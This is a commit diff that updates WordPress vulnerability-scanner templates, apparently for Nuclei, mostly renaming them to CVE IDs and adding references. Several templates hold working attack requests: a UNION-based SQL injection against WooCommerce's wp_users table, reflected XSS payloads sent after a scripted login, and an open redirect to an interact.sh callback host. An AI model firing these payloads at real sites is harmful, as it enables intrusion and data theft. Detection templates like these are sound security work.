Update Wordpress templates: typo, cve-id, ref & remove dupe

patch-1
Akincibor 2022-08-06 18:54:58 +02:00
parent 2a38c4c43e
commit db692605d4
30 changed files with 75 additions and 158 deletions

View File

@ -1,4 +1,4 @@
id: sniplets-xss id: CVE-2008-1060
info: info:
name: Wordpress Plugin Sniplets - Cross-Site Scripting name: Wordpress Plugin Sniplets - Cross-Site Scripting
@ -7,6 +7,7 @@ info:
description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets
reference: reference:
- https://www.exploit-db.com/exploits/5194 - https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
tags: xss,wordpress,wp-plugin,wp tags: xss,wordpress,wp-plugin,wp
requests: requests:

View File

@ -1,4 +1,4 @@
id: sniplets-lfi id: CVE-2008-1061
info: info:
name: WordPress Sniplets 1.1.2 - Local File Inclusion name: WordPress Sniplets 1.1.2 - Local File Inclusion
@ -7,10 +7,12 @@ info:
description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion. description: WordPress Sniplets 1.1.2 is vulnerable to local file inclusion.
reference: reference:
- https://www.exploit-db.com/exploits/5194 - https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2008-1061
tags: wordpress,wp-plugin,lfi,wp tags: wordpress,wp-plugin,lfi,wp
requests: requests:

View File

@ -1,4 +1,4 @@
id: db-backup-lfi id: CVE-2014-9119
info: info:
name: WordPress DB Backup <=4.5 - Local File Inclusion name: WordPress DB Backup <=4.5 - Local File Inclusion
@ -12,6 +12,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2014-9119
tags: wordpress,wp-plugin,lfi,wp tags: wordpress,wp-plugin,lfi,wp
requests: requests:

View File

@ -1,4 +1,4 @@
id: candidate-application-lfi id: CVE-2015-1000005
info: info:
name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
@ -11,6 +11,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6 cvss-score: 8.6
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2015-1000005
tags: wordpress,wp-plugin,lfi,wp tags: wordpress,wp-plugin,lfi,wp
requests: requests:

View File

@ -1,16 +1,18 @@
id: simple-image-manipulator-lfi id: CVE-2015-1000010
info: info:
name: WordPress Simple Image Manipulator 1.0 - Local File Inclusion name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
author: dhiyaneshDK author: dhiyaneshDK
severity: high severity: high
description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. description: WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
reference: reference:
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
- https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2015-1000010
tags: wordpress,wp-plugin,lfi,wp tags: wordpress,wp-plugin,lfi,wp
requests: requests:

View File

@ -1,17 +1,19 @@
id: wp-revslider-file-download id: CVE-2015-1579
info: info:
name: Wordpress Revslider - Local File Inclusion name: WordPress Slider Revolution - Local File Disclosure
author: pussycat0x author: pussycat0x
severity: high severity: high
description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file. description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
reference: reference:
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129 - https://cxsecurity.com/issue/WLB-2021090129
- https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2015-1579
metadata: metadata:
google-dork: inurl:/wp-content/plugins/revslider google-dork: inurl:/wp-content/plugins/revslider
tags: wordpress,wp-plugin,lfi,revslider tags: wordpress,wp-plugin,lfi,revslider

View File

@ -1,7 +1,7 @@
id: wordpress-infinitewp-auth-bypass id: CVE-2020-8772
info: info:
name: WordPress InfiniteWP Client Authentication Bypass name: InfiniteWP Client < 1.9.4.5 - Authentication Bypass
author: princechaddha author: princechaddha
severity: critical severity: critical
description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner
@ -9,9 +9,11 @@ info:
reference: reference:
- https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ - https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
- https://wordpress.org/plugins/iwp-client/#developers - https://wordpress.org/plugins/iwp-client/#developers
- https://wpscan.com/vulnerability/fac62d36-0fa1-4b43-8f5c-bddbd0cff140
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2020-8772
remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher. remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
tags: wordpress,auth-bypass,wp-plugin tags: wordpress,auth-bypass,wp-plugin

View File

@ -1,4 +1,4 @@
id: ninjaform-open-redirect id: CVE-2021-24165
info: info:
name: Ninja Forms < 3.4.34 - Administrator Open Redirect name: Ninja Forms < 3.4.34 - Administrator Open Redirect

View File

@ -1,20 +1,13 @@
id: CVE-2021-25112 id: CVE-2021-25112
info: info:
name: WordPress WHMCS Bridge < 6.4b - Cross-Site Scripting name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
author: DhiyaneshDK author: dhiyaneshDk
severity: medium severity: medium
description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard. description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
reference: reference:
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112 tags: wordpress,wp-plugin,authenticated,whmcs,xss
- https://plugins.trac.wordpress.org/changeset/2659751
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25112
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
requests: requests:
- raw: - raw:
@ -26,7 +19,6 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- | - |
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
@ -37,7 +29,8 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- "<img src onerror=alert(document.domain)>" - "<strong><img src onerror=alert(document.domain)></strong>"
condition: and
- type: word - type: word
part: header part: header
@ -47,5 +40,3 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/04/21

View File

@ -1,26 +1,30 @@
id: wordpress-woocommerce-sqli id: CVE-2021-32789
info: info:
name: Woocommerce Unauthenticated SQL Injection name: WooCommerce Blocks 2.5 to 5.5 & Woocommerce 3.3 to 5.5 - Authenticated ? & Unauthenticated SQL Injection
author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot,akincibor
severity: critical severity: critical
description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability.
reference: reference:
- https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
- https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
- https://wpscan.com/vulnerability/1212fec8-1fde-41e5-af70-abdd7ffe5379 #CVE-2021-32790 (Authenticated ?)
- https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a #CVE-2021-32789
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0 cvss-score: 10.0
cwe-id: CWE-89 cwe-id: CWE-89
tags: wordpress,woocommerce,sqli,wp-plugin,injection cve-id: CVE-2021-32789
tags: wordpress,woocommerce,sqli,wp-plugin,injection,wp
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
- '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word

View File

@ -1,4 +1,4 @@
id: accessibility-helper-xss id: CVE-2022-0150
info: info:
name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS) name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)

View File

@ -1,18 +1,20 @@
id: admin-word-count-column-lfi id: CVE-2022-1390
info: info:
name: WordPress Admin Word Count Column 2.2 - Local File Inclusion name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
author: daffainfo,Splint3r7 author: daffainfo,Splint3r7
severity: high severity: high
description: WordPress Admin Word Count Column 2.2 is vulnerable to local file inclusion. description: The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
reference: reference:
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- https://wordpress.org/plugins/admin-word-count-column/ - https://wordpress.org/plugins/admin-word-count-column/
- https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
remediation: This plugin has been closed as of March 29, 2022 and is not available for download. remediation: This plugin has been closed as of March 29, 2022 and is not available for download.
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2022-1390
tags: wordpress,wp-plugin,lfi,wp tags: wordpress,wp-plugin,lfi,wp
requests: requests:

View File

@ -1,17 +1,19 @@
id: cab-fare-calculator-lfi id: CVE-2022-1391
info: info:
name: WordPress Cab fare calculator 1.0.3 - Local File Inclusion name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
author: Hassan Khan Yusufzai - Splint3r7 author: Hassan Khan Yusufzai - Splint3r7
severity: high severity: high
description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion. description: WordPress Cab fare calculator 1.0.3 is vulnerable to local file inclusion.
reference: reference:
- https://www.exploit-db.com/exploits/50843 - https://www.exploit-db.com/exploits/50843
- https://wordpress.org/plugins/cab-fare-calculator - https://wordpress.org/plugins/cab-fare-calculator
- https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2022-1391
tags: wordpress,wp-plugin,lfi,wp tags: wordpress,wp-plugin,lfi,wp
requests: requests:

View File

@ -8,6 +8,7 @@ info:
reference: reference:
- https://cxsecurity.com/issue/WLB-2017100084 - https://cxsecurity.com/issue/WLB-2017100084
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
- https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5

View File

@ -8,6 +8,7 @@ info:
reference: reference:
- https://wpscan.com/vulnerability/9873 - https://wpscan.com/vulnerability/9873
- https://id.wordpress.org/plugins/advanced-access-manager/ - https://id.wordpress.org/plugins/advanced-access-manager/
- https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5

View File

@ -1,7 +1,7 @@
id: brandfolder-open-redirect id: brandfolder-open-redirect
info: info:
name: WordPress Brandfolder - Remote/Local File Inclusion name: WordPress Brandfolder - Open Redirect
author: 0x_Akoko author: 0x_Akoko
severity: low severity: low
description: WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. description: WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.

View File

@ -1,10 +1,10 @@
id: eatery-restaurant-open-redirect id: eatery-restaurant-open-redirect
info: info:
name: WordPress Attitude Themes 1.1.1 Open Redirection name: WordPress Eatery Restaurant Themes < 2.2 - Open Redirection
author: 0x_Akoko author: 0x_Akoko
severity: low severity: low
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL. description: The WordPress Eatery Themes allows remote attackers to redirect users to an attacker controlled URL.
reference: reference:
- https://cxsecurity.com/issue/WLB-2020030183 - https://cxsecurity.com/issue/WLB-2020030183
tags: wordpress,wp-theme,redirect tags: wordpress,wp-theme,redirect

View File

@ -1,41 +0,0 @@
id: feedwordpress-xss
info:
name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
author: dhiyaneshDk
severity: medium
description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
reference:
- https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
tags: wordpress,wp-plugin,xss,feedwordpress,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><img src=2 onerror=alert(document.domain)>" method="post">'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -7,6 +7,7 @@ info:
description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file. description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
reference: reference:
- https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
- https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1
tags: wordpress,wp-theme,lfi tags: wordpress,wp-theme,lfi
requests: requests:

View File

@ -1,24 +0,0 @@
id: newsletter-manager-open-redirect
info:
name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
author: akincibor
severity: low
description: |
The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
reference:
- https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
metadata:
verified: true
tags: wp-plugin,redirect,wordpress,wp,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -4,6 +4,9 @@ info:
name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
author: Random_Robbie author: Random_Robbie
severity: medium severity: medium
description: AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.
reference:
- https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
tags: wordpress,wp-plugin,sassy,xss tags: wordpress,wp-plugin,sassy,xss
requests: requests:

View File

@ -1,17 +1,19 @@
id: video-synchro-pdf-lfi id: CVE-2022-1392
info: info:
name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
author: Hassan Khan Yusufzai - Splint3r7 author: Splint3r7
severity: high severity: high
description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion. description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
reference: reference:
- https://www.exploit-db.com/exploits/50844 - https://www.exploit-db.com/exploits/50844
- https://wordpress.org/plugins/video-synchro-pdf/ - https://wordpress.org/plugins/video-synchro-pdf/
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cwe-id: CWE-22 cwe-id: CWE-22
cve-id: CVE-2022-1392
tags: wordpress,wp-plugin,lfi,wp tags: wordpress,wp-plugin,lfi,wp
requests: requests:

View File

@ -1,7 +1,7 @@
id: w3c-total-cache-ssrf id: w3c-total-cache-ssrf
info: info:
name: Wordpress W3C Total Cache SSRF <= 0.9.4 name: Wordpress W3C Total Cache <= 0.9.4 - Unauthenticated Server Side Request Forgery (SSRF)
author: random_robbie author: random_robbie
severity: medium severity: medium
description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.

View File

@ -4,7 +4,10 @@ info:
name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
author: randomrobbie author: randomrobbie
severity: medium severity: medium
tags: wordpress,wp-plugin description: The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
reference:
- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
tags: wordpress,wp-plugin,wp
requests: requests:
- method: GET - method: GET

View File

@ -1,12 +1,13 @@
id: wordpress-zebra-form-xss id: wordpress-zebra-form-xss
info: info:
name: Wordpress Zebra Form - Cross-Site Scripting name: Zebra_Form Library <= 2.9.8 - Reflected Cross-Site Scripting (XSS)
author: madrobot author: madrobot
severity: medium severity: medium
reference: reference:
- https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
tags: wordpress,xss - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
tags: wordpress,xss,wp
requests: requests:
- raw: - raw:

View File

@ -1,11 +1,12 @@
id: wp-ambience-xss id: wp-ambience-xss
info: info:
name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) name: WordPress Theme Ambience <= 1.0 - Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: reference:
- https://www.exploit-db.com/exploits/38568 - https://www.exploit-db.com/exploits/38568
- https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
tags: wordpress,xss,wp-plugin tags: wordpress,xss,wp-plugin
requests: requests:

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: reference:
- https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html # Is this stored ?
tags: wordpress,xss,wp-plugin tags: wordpress,xss,wp-plugin
requests: requests:

View File

@ -1,42 +0,0 @@
id: wp-whmcs-xss
info:
name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
author: dhiyaneshDk
severity: medium
description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
tags: wordpress,wp-plugin,authenticated,whmcs,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<strong><img src onerror=alert(document.domain)></strong>"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -1,12 +1,13 @@
id: wp-woocommerce-email-verification id: wp-woocommerce-email-verification
info: info:
name: WordPress WooCommerce <1.8.2 - Authentication Bypass name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
author: random_robbie,daffianfo author: random_robbie,daffianfo
severity: critical severity: critical
description: WordPress WooCommerce prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. description: Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
reference: reference:
- https://wpvulndb.com/vulnerabilities/10318 - https://wpvulndb.com/vulnerabilities/10318
- https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
classification: classification:
cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0 cvss-score: 10.0

View File

@ -1,7 +1,7 @@
id: wp-woocommerce-file-download id: wp-woocommerce-file-download
info: info:
name: WordPress WooCommerce < 1.2.7 - Arbitrary File Retrieval name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
author: 0x_Akoko author: 0x_Akoko
severity: high severity: high
description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated
@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6 cvss-score: 8.6
cwe-id: CWE-22 cwe-id: CWE-22
tags: wordpress,woocommerce,lfi tags: wordpress,woocommerce,lfi,wp
requests: requests:
- method: GET - method: GET